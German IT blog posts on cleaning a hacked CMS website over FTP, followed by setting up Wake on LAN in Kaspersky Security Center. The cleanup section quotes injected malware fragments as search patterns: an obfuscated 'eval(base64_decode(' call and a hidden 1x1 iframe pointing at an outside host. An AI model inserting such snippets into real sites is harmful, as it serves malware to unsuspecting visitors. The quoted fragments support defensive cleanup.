Plugins und Erweiterungen

Sobald ein System durch fremde Erweiterungen ergänzt wird steigt die Gefahr einer Sicherheitslücke. Verwenden Sie nur aktuelle Erweiterungen die regelmässig aktualisiert werden und sauber aufgebaut sind. Hier lohnt sich auch einen Blick auf kostenpflichtige Plugins zu werfen – Sie können sich damit eine Menge Ärger ersparen.

Themes und Designs

Wenn Sie Themes oder Designs für Ihr CMS aus dem Web beziehen, achten Sie auf die Quelle. Sie finden viele kostenpflichtige Themes „kostenlos“ im Netz – leider installieren Sie damit aber manchmal nicht nur das Design sondern auch noch ein Hintertürchen. Auch hier gilt – ein Blick auf kostenpflichtige Themes lohnt sich!

Webhoster

Webhoster gibt es mittlerweile wie Sand am Meer. Ein grosser Teil davon sind sogenannte Reseller, d.h. sie kaufen ein Hostingprodukt ein und verkaufen es weiter. Nicht immer sind die entsprechenden Reseller aber auch zuverlässig oder mit den Gefahren des Webs vertraut. Achten Sie deshalb nicht immer nur auf den Preis, sonder vor allem ob der Hoster wirklich sein eigenes Hosting betreibt und weiss was er tut.

Kenne deinen Feind

Bereits Sunzi wusste; Kenne deinen Feind! Daher ist immer auch die Identifikation der „Hacker“ ein Ziel. Glücklicherweise sind die meisten Attacken „Massenware“, d.h. sie werden nicht gezielt gegen eine Webseite gerichtet sondern gegen alle angreifbaren. Die Tools dazu werden entweder in entsprechenden Foren gekauft oder selbst erstellt.

Hack for money

Malware Webseite

Gehackte Webseiten mit Schadcode werden relativ rasch gesperrt – leider auch für potentielle Kunden oder Besucher…

Um es kurz zu machen – diese Angreifer möchten früher oder später Geld verdienen. Dementsprechend leiten Sie Ihre Besucher entweder um oder laden im Hintergrund Schadsoftware auf die Besucherrechner. Um den Profit zu maximieren laufen diese  Angriffe automatisiert ab, da sich diese Masche nur in grossen Mengen auszahlt (wenn überhaupt…). Dabei werden häufig .php-Files Ihrer Webseite verändert mit der Folge dass die ursprüngliche Webseite entweder gar nicht mehr oder nur noch eingeschränkt funktioniert.

Hack for prestige

Hack for prestige

Anders als beim obigen Beispiel bekennt sich hier eine Gruppe zum Angriff

Mittlerweile gibt es im Web Ranglisten für Gruppen welche die meisten Webseiten infiltriert haben. Der einzige Zweck eines solchen Angriffs ist demnach – Prestige! Obwohl für Besucher keine direkte Gefahr droht, wird auch hier die Webseite verändert um „zu beweisen“ dass sie gehackt wurde – selbstverständlich immer mit einigen Bemerkungen der jeweiligen Gruppe. Im Beispiel links wird netterweise sogar erwähnt wie die Seite in den „Originalzustand“ zurück versetzt werden kann.

Website desinfizieren

Da die gehackte Webseite in den meisten Fällen nicht mehr öffentlich zugänglich ist bzw. nur noch teilweise funktioniert, muss die Desinfektion auf einer anderen Ebene erfolgen – per FTP.

Zugang per FTP verschaffen

Wie man sich Zugang per FTP verschafft wird vielen bekannt sein. Falls nicht – einfach Filezilla herunterladen und mit den entsprechenden Benutzerdaten einloggen. Diese finden sich auf dem Datenblatt des Hosters.

Webseite per FTP desinfiszieren

Sobald die FTP-Verbindung steht, sollte man sich zuerst einen Überblick über die Ordnerstruktur verschaffen. Häufig befinden sich die für uns relevanten Daten im Ordner „httpdocs“. Neben einigen Unterordnern sollte dort auch eine Datei „index.php“ vorhanden sein. Diese einfach mittels Drag&Drop auf den Desktop kopieren und mit einem Texteditor öffnen (Tipp: Notepad ++ eignet sich hervorragend dafür).

 

 

 Schadcode identifizieren

Nun folgt die eigentliche Suche nach dem Schadcode. Irgendwo im Code, häufig aber direkt am Anfang des .php – Files finden sich Zeilen, die einfach nicht so recht hineinpassen wollen. Einige beginnen beispielsweise so:

<script type="text/javascript">// <![CDATA[var
eval(base64_decode(
<iframe src="http://efwel.pro/7dfs32s/" height="1" width="1" frameborder="0" scrolling="no">

Das der Schadcode nicht direkt sichtbar ist sondern verschleiert wird ergibt sich aus dem Zusammenhang – der Angreifer möchte möglichst wenig Spuren hinterlassen. So liegen dann auch die eingebundenen Schadcodeteile meist auf gekaperten Servern – und niemals direkt beim Täter.

Wem die Suche nach „verdächtigem Code“ zu mühsam ist, kann selbstverständlich auch mit Originaldateien vergleichen.

Schadcode entfernen

Da in den wenigsten Fällen nur ein File betroffen ist, müssen wir sämtliche Dateien überprüfen. Dazu setzen wir sämtliche Schritte zusammen:

  1. Schadcode entfernenDownload der gesamten Webseite via FTP (siehe Zugang per FTP)
  2. Identifizierten Schadcode in die Zwischenablage kopieren (siehe Schadcode identifizieren)
  3. Notepad ++ öffnen. Unter „Suchen“ in „Dateien suchen“ das komplette, heruntergeladene Verzeichnis nach dem Schadcode durchsuchen (Bild A)
  4. Falls mehrere Ergebnisse gefunden werden können  im selben Fenster mit „Ersetzen durch“ sämtliche Einträge gelöscht werden (Bild B).
  5. Abschliessend sollten die Dateien noch mit einem Antivirus bspw. Kaspersky gescannt werden (Findet manchmal noch Einträge…)

Hinweise

Es gibt keine Garantie, dass wirklich sämtlicher Schadcode entfernt wurde. Wer auf Nummer sicher gehen will, sollte sämtliche Files durch Originaldateien ersetzen und die Datenbank neu anbinden. Eventuell vorgenommene Modifikation an Design / CMS gehen dabei verloren. Wer über ein Backup verfügt sollte zuallererst dieses einspielen…

Um festzustellen, ob auch andere Webseiten auf demselben Hoster vom Hack betroffen sind lohnt sich ein Blick auf http://www.yougetsignal.com/tools/web-sites-on-web-server/. Dadurch kann man das Ausmass etwa abschätzen und weitere Schritte planen (z.B. Hoster informieren/wechseln)

Wer gerne den Schadcode etwas genauer analysieren möchte kann dazu diverse Onlinetools (z.B. http://www.unphp.net/) verwenden. Diese „entschlüsseln“ den Code mehr oder weniger schlecht…

Wenn die Webseite erneut gehackt wird, sollten die Risikofaktoren auf jeden Fall erneut überprüft werden

KMU und „Wake on LAN“

- - IT, Tutorials

Gerade bei KMU’s ist es häufig so, dass die Arbeitsplätze häufig stark ausgelastet sind. Die Mitarbeiter kommen am morgen, lassen den Computer den ganzen Tag an und fahren in am Abend wieder herunter. Updates und Wartungsarbeiten während der Arbeitszeit automatisch durchzuführen ist zwar möglich aber meist ungeeignet. Die optimale Lösung? Wake on LAN!

Wake on LAN?

Selten wurde ein IT-Begriff so treffend gewählt wie Wake on LAN, auf deutsch „Wecken per Lokalem Netzwerk“. Genau das passiert nämlich: Ein ausgeschalteter Computer startet aufgrund eines Signals der Netzwerkkarte. Voraussetzung dafür ist aber:

  • Kompatible Netzwerkkarte (APM/ACPI Support)
  • Sauber strukturiertes LAN
  • Software (z.B. WOL2) oder entsprechender Router (z.B. DD-WRT)

Vereinfacht sollte eigentlich jeder Computer ab ca. 2008 über eine entsprechende Netzwerkkarte verfügen. Falls nicht bekannt, einfach kurz im BIOS überprüfen bzw. aktivieren.

Anwendungsbeispiele

Mögliche Anwendungen gibt es unzählige. Hier einige (sinnvolle) Beispiele:

  • Arbeitsstationen „präventiv“ hochfahren, d.h. falls Arbeitsbeginn um 7.30 Uhr um 7.20 sämtliche Stationen hochfahren
  • Updates über Nacht einspielen
  • Schadcodescan über Nacht
  • Als Ergänzung zur Fernwartung
  • Energiemanagement (v.a. im Zusammenhang mit Virtualisierung). Server nur bei „Bedarf“ aktivieren.

Eine „elegante“ WOL Lösung mit Kaspersky

Kaspersky bietet mit dem Administrationsclient bzw. dem Security Center eine eingebaute „Wake on LAN“ – Lösung. Damit können für einzelne Gruppen oder Arbeitsstationen wiederkehrende Aufgaben erstellt werden die dann vollkommen automatisch ausgeführt werden. Diese Lösung ist „elegant“ weil keinerlei Zusatzsoftware benötigt wird sondern vorhandene Ressourcen (besser) genutzt  werden.

Ziel der Übung

Die Arbeitsstationen sollen um 1 Uhr nachts automatisch gestartet werden, ein Schadcodescan durchgeführt und sämtliche Updates eingespielt werden. Danach sollen die Computer wieder heruntergefahren werden.

Aufgabe in Kaspersky Security Center erstellen

Wake-on-LAN Aufgabe erstellenZu Beginn erstellt man eine neue Aufgabe im Kaspersky Security Center. Was genau diese Aufgabe dann erledigen soll, kann im Verlauf des Assistenten angeben werden (Update, Virusscan, Rollback…). Idealerweise wählt man etwas, das auch durchgeführt werden soll – in diesem Beispiel ein einfacher Virusscan.

 

Wake on LAN im Kaspersky Security Center aktivieren

Wake-On-LAN KasperskySobald die Aufgabe erstellt ist, müssen die Feineinstellungen vorgenommen werden. Zu diesen gelangt man durch Rechtsklick auf die entsprechende Aufgabe und auswählen der Option „Eigenschaften„.  Unter dem Menüpunkt „Zeitplan“ befindet sich der gut versteckte Punkt „Erweitert„.

 

 

Wake-On-LAN Kaspersky aktivierenHier das Häkchen bei „Computer vor dem Aufgabenstart per Wake on LAN aktivieren“ setzten. Je nach System sollte die Verzögerung angepasst werden. 5 Minuten sollten aber in den meisten Fällen ausreichen.

 

Der grösste Teil der Konfiguration ist damit bereits erledigt. Das Security Center sendet um 00.00 Uhr ein WOL – Signal an die betreffenden Computer, wartet 5 Minuten bis diese hochgefahren sind und beginnt dann mit dem Virusscan.

Weitere Aufgaben anfügen

Nun können weitere Aufgaben hinzugefügt werden – das Vorgehen bleibt dabei  immer gleich. Um also z.B. aktuelle Updates zu installieren einfach eine Aufgabe „Windows-Updates installieren“ erstellen. Idealerweise wählt man parallel dazu den Windows eigenen Updatezeitpunkt ebenfalls im gleichen Zeitrahmen (in diesem Fall 00.00 Uhr). Doppelt hält besser 😉

Security Center Aufgabe anhaengenJede nachfolgende Aufgabe sollte Bezug auf die vorhergehende nehmen – daher beim Zeitplan immer „Nach Beenden einer anderen Aufgabe“ die vorhergehende Aufgabe angeben. Bei der letzten Aufgabe kann dann unter „Erweitert“ das Häkchen „Computer nach Beendigung der Aufgabe herunterfahren“ gesetzt werden.

 

 

Ergänzende Überlegungen

Das System funktioniert sehr gut im Zusammenhang mit WSUS. Interessant ist aber auch die Aufgabe „Programm starten“ des Security Centers. Dadurch können Updates von Drittanbietern, Skripts oder Batchfiles zeitgesteuert per WOL ausgeführt werden.

Ein kritischer Faktor ist hingegen die Zeit; Scans und Updates dauern nicht immer gleich lange und sollten deshalb grosszügig kalkuliert werden.

Schlussendlich verfügt man mit dem Kaspersky Security Center aber über eine ressourcenschonende und stark individualisierbaren Lösung – perfekt für KMU’s.